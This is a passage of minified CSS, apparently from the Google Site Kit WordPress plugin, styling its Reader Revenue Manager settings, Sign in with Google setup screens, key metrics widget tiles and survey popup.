.googlesitekit-rrm-settings-edit .googlesitekit-rrm-settings-edit__post-types{margin-top:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-rrm-settings-edit__post-types{margin-top:24px}}.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-rrm-settings-edit__post-types h5{margin:0 0 14px}.googlesitekit-plugin .googlesitekit-setup-module--reader-revenue-manager form>.googlesitekit-cta-link{font-weight:500}.googlesitekit-plugin .googlesitekit-setup-module--reader-revenue-manager .googlesitekit-setup-module__step .googlesitekit-publication-onboarding-state-notice{margin-bottom:40px}.googlesitekit-plugin .googlesitekit-setup-module__publication-create-screen .googlesitekit-setup-module__title,.googlesitekit-plugin .googlesitekit-setup-module__publication-create-screen .googlesitekit-setup-module__description{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:400;letter-spacing:.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-setup-module__publication-create-screen .googlesitekit-setup-module__title{margin-bottom:0}.googlesitekit-plugin .googlesitekit-setup-module__publication-create-screen .googlesitekit-setup-module__description{margin-top:3px}.googlesitekit-plugin .googlesitekit-setup-module__publication-create-screen .googlesitekit-setup-module__action{margin-top:40px}.googlesitekit-plugin .googlesitekit-setup-module__publication-create-screen .googlesitekit-setup-module__action svg{margin-left:6px}.googlesitekit-plugin .googlesitekit-sign-in-with-google-compatibility-notice{margin-bottom:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-sign-in-with-google-compatibility-notice{margin-right:24px}}.googlesitekit-plugin .googlesitekit-sign-in-with-google-compatibility-notice .googlesitekit-notice__title{margin-bottom:4px}.googlesitekit-plugin .googlesitekit-sign-in-with-google-compatibility-notice .googlesitekit-notice__content span{display:block}.googlesitekit-plugin .googlesitekit-sign-in-with-google-compatibility-notice .googlesitekit-notice__content span:not(:last-child){margin:0 0 5px}@media(min-width: 1500px){.googlesitekit-plugin .googlesitekit-setup-cta-banner__svg-wrapper--sign-in-with-google-setup-cta{height:100%;position:relative}}.googlesitekit-plugin .googlesitekit-setup-cta-banner__svg-wrapper--sign-in-with-google-setup-cta svg{display:block;justify-self:center;max-height:180px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup-cta-banner__svg-wrapper--sign-in-with-google-setup-cta svg{max-height:210px}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-setup-cta-banner__svg-wrapper--sign-in-with-google-setup-cta svg{justify-self:flex-end;max-height:274px}}@media(min-width: 1500px){.googlesitekit-plugin .googlesitekit-setup-cta-banner__svg-wrapper--sign-in-with-google-setup-cta svg{max-height:300px;position:absolute;right:0;top:50%;transform:translateY(-50%)}}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-badge{margin:0 0 2px 13px;padding:4px 8px}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .mdc-text-field{height:48px}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .mdc-text-field .mdc-floating-label{top:15px}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-setup-module__step-description{margin:0 0 1.7em}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-client-id-cta{font-weight:500;min-height:32px;padding:3px 18px}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-client-id-cta svg{margin-left:6px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form{display:flex;justify-content:space-between}}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item{flex:2}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item{max-width:510px}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item{max-width:670px}}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item--with-svg{flex:1;margin-bottom:-16px;overflow:hidden;position:relative;text-align:center}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item--with-svg{bottom:unset;margin-bottom:-25px;min-width:40%;top:-30px}}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item--with-svg svg{display:none;height:100%;position:relative;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item--with-svg svg{bottom:-60px;display:inline-block;max-height:260px}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item--with-svg svg{bottom:unset;max-height:248px}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-sign-in-with-google-setup__form .googlesitekit-setup-module__panel-item--with-svg svg{max-height:300px}}.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-settings-module__fields-group,.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-text-field-client-id{width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--sign-in-with-google .googlesitekit-setup-module__step p{max-width:610px}}.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google{margin-top:32px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google{margin-top:0}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google .mdc-layout-grid{padding:24px 48px}}.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google .mdc-layout-grid .mdc-layout-grid__cell:first-child{order:2}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google .mdc-layout-grid .mdc-layout-grid__cell:first-child{order:1}}.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google .mdc-layout-grid .mdc-layout-grid__cell:last-child{order:1}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google .mdc-layout-grid .mdc-layout-grid__cell:last-child{justify-self:start;margin-left:0}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup__footer--sign-in-with-google .mdc-layout-grid .mdc-layout-grid__cell:last-child{order:2}}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-settings-module__footer{margin-top:30px}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google>.mdc-layout-grid{margin-bottom:0}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-text-field-client-id,.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select,.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select__selected-text{height:52px}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select{width:100%}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select .mdc-select__selected-text{min-width:100%;padding-top:12px}@media(min-width: 960px)and (max-width: 1280px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select .mdc-select__selected-text{padding-right:28px}}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select .mdc-select__dropdown-icon{bottom:14px}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-select.mdc-select--focused .mdc-select__dropdown-icon{transform:rotate(180deg)}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__one-tap{margin-top:24px}}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__one-tap,.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__show-next-to-comments{border-bottom:none}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__one-tap .mdc-switch,.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__show-next-to-comments .mdc-switch{margin-left:3px}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__one-tap p,.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-settings-module__show-next-to-comments p{color:#6c726e;letter-spacing:.2px;margin:4px 0 0}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-sign-in-with-google-settings-fields__button-preview{margin-left:30px}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .googlesitekit-sign-in-with-google-settings-fields__button-preview .mdc-layout-grid__inner{display:block}}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid{padding:0}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid .mdc-layout-grid .mdc-layout-grid__inner{margin-bottom:24px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid .mdc-layout-grid .mdc-layout-grid__inner{margin-bottom:0}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid.googlesitekit-sign-in-with-google-settings-fields__stretch-form{display:flex;flex-direction:column;height:100%;justify-content:space-between;margin-right:52px;width:100%}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid.googlesitekit-sign-in-with-google-settings-fields__stretch-form>.mdc-layout-grid__inner:last-child{margin-bottom:0}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid.googlesitekit-sign-in-with-google-settings-fields__stretch-form>.mdc-layout-grid__inner:last-child .mdc-layout-grid__cell{margin-right:14px}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google-settings-fields .mdc-layout-grid.googlesitekit-sign-in-with-google-settings-fields__stretch-form>.mdc-layout-grid__inner:last-child .mdc-layout-grid__cell:last-child{margin:0}}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google__preview{background-color:#cbd0d3;border-radius:4px;display:flex;flex-direction:column;height:145px;justify-content:center;padding:0 10%;position:relative;width:100%}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google__preview--label{margin:0 0 1rem;text-align:center}.googlesitekit-plugin .googlesitekit-settings-module--sign-in-with-google .googlesitekit-sign-in-with-google__preview--protector{height:100%;left:0;position:absolute;top:0;width:100%;z-index:10}.googlesitekit-plugin .googlesitekit-registration-disabled-notice .mdc-layout-grid{padding:12px 0 24px 0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-registration-disabled-notice .mdc-layout-grid{padding-bottom:14px;padding-top:14px}}.googlesitekit-plugin #sign-in-with-google-compatibility-warning .googlesitekit-notice__description span{display:block;margin:3px 0}.googlesitekit-plugin .googlesitekit-km-widget-tile{display:flex;flex-direction:column;justify-content:space-between;padding:12px 16px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile{min-height:150px;padding:18px 24px}}.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-info-tooltip{color:#108080}.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__title-container{display:flex;flex-basis:50%;flex-grow:1}.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__title{color:#6c726e;flex:1;font-weight:400;line-height:16px;margin:0 8px 4px 0}.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__body{display:flex;flex-basis:50%;flex-grow:1}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__body{flex-direction:column}}.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__metric-container{flex-basis:100%}.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__metric-change-container{align-self:flex-end;display:flex}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile .googlesitekit-km-widget-tile__metric-change-container{align-self:auto}}.googlesitekit-plugin .googlesitekit-km-widget-tile--numeric .googlesitekit-km-widget-tile__metric{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:32px;line-height:1.25;margin-top:4px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--numeric .googlesitekit-km-widget-tile__metric{margin:0}}.googlesitekit-plugin .googlesitekit-km-widget-tile--numeric .googlesitekit-km-widget-tile__subtext{font-size:12px;font-weight:500;line-height:1.33;margin:-1px 0 1px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--numeric .googlesitekit-km-widget-tile__subtext{font-size:14px;font-weight:400;line-height:1.43;margin:-4px 0 1px}}.googlesitekit-plugin .googlesitekit-km-widget-tile--text .googlesitekit-km-widget-tile__metric{font-size:18px;font-weight:500;margin-top:4px;text-transform:capitalize}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--text .googlesitekit-km-widget-tile__metric{margin:5px 0 0}}.googlesitekit-plugin .googlesitekit-km-widget-tile--text .googlesitekit-km-widget-tile__subtext{font-size:12px;font-weight:500;line-height:1.33;margin:2px 0 0}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--text .googlesitekit-km-widget-tile__subtext{font-size:14px;font-weight:400;line-height:1.43;margin:0}}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-km-widget-tile__table{display:flex;flex-direction:column;font-size:12px;margin-top:12px;width:100%}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-table__body-row{display:flex;flex-direction:row;justify-content:space-between;padding:2px 0}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-table__body-item{margin-right:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-table__body-item:last-child{margin-right:0;overflow:visible;text-overflow:unset}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-table__body-item strong{font-weight:500}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-table__body-item .googlesitekit-cta-link{display:inline}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-km-widget-tile__table-plain-text{color:#161b18;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0;overflow:hidden;text-overflow:ellipsis}.googlesitekit-plugin .googlesitekit-km-widget-tile--table .googlesitekit-table__body-zero-data{font-size:14px;line-height:1.43}.googlesitekit-plugin .googlesitekit-km-widget-tile__loading{width:100%}.googlesitekit-plugin .googlesitekit-km-widget-tile__loading .googlesitekit-km-widget-tile__loading-body{margin-top:10px}.googlesitekit-plugin .googlesitekit-km-widget-tile--error{height:100%}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error{background:#fff;border:2px solid #7a1e00;padding:14px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error{min-height:150px;padding:16px 22px}}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-cta__header{column-gap:8px;display:flex;flex-basis:50%}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-cta__header svg{color:#108080}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-cta__header_text{color:#6c726e;font-weight:400;line-height:1.286;margin:0 0 10px}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-cta__title{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:18px;font-weight:400}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions{align-items:flex-start;display:flex;flex-direction:row-reverse;gap:0}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions{flex-direction:column-reverse}}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions .googlesitekit-error-retry-text{color:#161b18;flex:1;margin:0;margin-right:14px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions .googlesitekit-error-retry-text{margin-right:0}}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions button:not(.googlesitekit-cta-link),.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions a.mdc-button{align-self:flex-end;min-height:32px;padding:6px 16px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions button:not(.googlesitekit-cta-link),.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions a.mdc-button{align-self:flex-start;margin-top:10px}}.googlesitekit-plugin .googlesitekit-km-widget-tile--error .googlesitekit-cta--error .googlesitekit-report-error-actions .googlesitekit-cta-link{color:#108080}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .mdc-layout-grid__inner{grid-template-rows:auto 1fr}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .mdc-layout-grid__cell{display:grid;grid-row:span 3;grid-template-columns:subgrid;grid-template-rows:subgrid}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .mdc-layout-grid__cell{grid-row:span 2}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget{display:grid;grid-column:1/-1;grid-row:1/-1;grid-template-columns:subgrid;grid-template-rows:subgrid}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-cta--error,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-km-widget-tile--error{display:grid;grid-column:1/-1;grid-row:1/-1;grid-template-rows:subgrid}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-km-widget-tile{display:grid;gap:0;grid-column:1/-1;grid-row:1/-1;grid-template-columns:subgrid;grid-template-rows:subgrid}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--addMetricCTATile .googlesitekit-km-add-metric-cta-tile{grid-column:1/-1;grid-row:1/-1}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-km-widget-tile>div{grid-column:1/-1}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-cta--error>div,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-cta--error>h3{grid-column:1/-1}}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsConnectGA4All,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsSetupCTA{grid-template-columns:auto;grid-template-rows:auto}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsConnectGA4All .googlesitekit-widget-context,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsSetupCTA .googlesitekit-widget-context{padding:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsConnectGA4All .mdc-layout-grid__inner,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsSetupCTA .mdc-layout-grid__inner{grid-template-rows:auto}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsConnectGA4All .mdc-layout-grid__cell,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsSetupCTA .mdc-layout-grid__cell{grid-template-columns:auto;grid-template-rows:auto}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsConnectGA4All .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsSetupCTA .googlesitekit-widget__body{display:block}}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .mdc-layout-grid__inner.googlesitekit-widget-key-metrics-footer{display:inline-block}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget-key-metrics-footer>.googlesitekit-cta-link{margin:5px 0 0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget-key-metrics-footer>.googlesitekit-cta-link{margin:0 0 0 5px}}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile{align-items:center;display:flex;gap:8px;padding-bottom:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile{gap:12px;padding-bottom:24px}}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile__content .googlesitekit-km-connect-module-cta-tile__text{margin:0 0 4px}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile.googlesitekit-km-widget-tile{min-height:auto;padding:0}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile.googlesitekit-km-widget-tile .googlesitekit-km-connect-module-cta-tile{padding-top:8px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile.googlesitekit-km-widget-tile .googlesitekit-km-connect-module-cta-tile{padding-top:12px}}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile.googlesitekit-km-widget-tile.googlesitekit-km-widget-tile--combined{align-items:center;container:cta-tile/inline-size;display:flex;flex-direction:row}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile.googlesitekit-km-widget-tile.googlesitekit-km-widget-tile--combined .googlesitekit-km-connect-module-cta-tile{padding-top:16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile.googlesitekit-km-widget-tile.googlesitekit-km-widget-tile--combined .googlesitekit-km-connect-module-cta-tile{padding-top:24px}}.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile__ghost-card{display:none;height:90px;margin-right:12px;max-height:90px}@container cta-tile (inline-size > 400px){.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile__ghost-card:nth-child(2){display:flex;margin-left:12px}}@container cta-tile (inline-size > 600px){.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile__ghost-card:nth-child(4){display:flex}}@container cta-tile (inline-size > 900px){.googlesitekit-plugin .googlesitekit-widget--connectModuleCTATile .googlesitekit-km-connect-module-cta-tile__ghost-card:nth-child(3){display:flex}}.googlesitekit-plugin .googlesitekit-widget--addMetricCTATile .googlesitekit-km-add-metric-cta-tile{align-items:center;cursor:pointer;display:flex;flex-direction:column;height:100%;justify-content:center;padding:16px}.googlesitekit-plugin .googlesitekit-widget--addMetricCTATile .googlesitekit-km-add-metric-cta-tile:focus{border-radius:16px;outline:1px dotted #000}.googlesitekit-plugin .googlesitekit-widget--addMetricCTATile .googlesitekit-km-add-metric-cta-tile__icon{background-color:#ebeef0;border-radius:50%;color:#6c726e;height:48px;margin:0 auto;padding:16px;width:48px}.googlesitekit-plugin .googlesitekit-widget--addMetricCTATile .googlesitekit-km-add-metric-cta-tile__text{color:#6c726e;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;margin:7px 0 0}.googlesitekit-portal-survey{bottom:24px;position:fixed;right:24px;z-index:99999}@media(max-width: 449px){.googlesitekit-portal-survey{bottom:0;right:0}}@media(min-width: 1280px){.googlesitekit-portal-survey{bottom:34px;right:34px}}@media(min-width: 1366px){.googlesitekit-portal-survey{right:calc(((100vw - 1366px) / 2) - 47px)}}@media(max-width: 1500px){.googlesitekit-portal-survey{right:32px}}@media(max-width: 961px){.googlesitekit-portal-survey{right:26px}}@media(min-width: 783px){.folded .googlesitekit-portal-survey{right:calc(((100vw - 1366px) / 2) + 16px)}}@media(min-width: 1366px){.folded .googlesitekit-portal-survey{right:calc(((100vw - 1366px) / 2) + 16px)}}@media(max-width: 1500px){.folded .googlesitekit-portal-survey{right:32px}}@media(max-width: 961px){.folded .googlesitekit-portal-survey{right:26px}}.googlesitekit-plugin .googlesitekit-survey__header-logo{margin:0 16px 0 0;width:24px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__header-logo{margin-right:24px}}.googlesitekit-plugin .googlesitekit-survey__header-logo svg{display:block}.googlesitekit-plugin .googlesitekit-survey__header-close{position:absolute;right:-12px;top:-12px}.googlesitekit-plugin .googlesitekit-survey__header-close svg{fill:#5f6561}.googlesitekit-plugin .googlesitekit-survey__header{align-items:center;display:flex;flex-wrap:nowrap;padding:16px 16px 8px;position:relative}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__header{padding:24px 24px 8px}}.googlesitekit-plugin .googlesitekit-survey__header .mdc-button:not(:disabled){background-color:transparent;border-radius:50%;box-shadow:none;height:40px;min-width:40px;padding:0;transition:background .2s ease-in-out;width:40px}.googlesitekit-plugin .googlesitekit-survey__header .mdc-button:not(:disabled):hover,.googlesitekit-plugin .googlesitekit-survey__header .mdc-button:not(:disabled):focus{background-color:#ebeef0}.googlesitekit-plugin .googlesitekit-survey__header .googlesitekit-typography.googlesitekit-typography--headline{color:#161b18;font-size:16px;line-height:1.5;margin:0}.googlesitekit-plugin .googlesitekit-survey__header-details{flex:1 0;padding:0 32px 0 0;position:relative}.googlesitekit-plugin .googlesitekit-survey{background-color:#fff;border-radius:8px;box-shadow:rgba(0,0,0,.14) 0 16px 24px 2px,rgba(0,0,0,.12) 0 6px 30px 5px,rgba(0,0,0,.2) 0 8px 10px -5px;max-width:400px}@media(max-width: 449px){.googlesitekit-plugin .googlesitekit-survey{max-width:none}}.googlesitekit-plugin .googlesitekit-survey__body{padding:0 0 16px;position:relative}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__body{padding-bottom:24px}}.googlesitekit-plugin .googlesitekit-survey__choices{display:flex;flex-wrap:nowrap;justify-content:space-between;margin-top:8px}.googlesitekit-plugin .googlesitekit-survey__choices>div{min-width:50px;overflow:visible}.googlesitekit-plugin 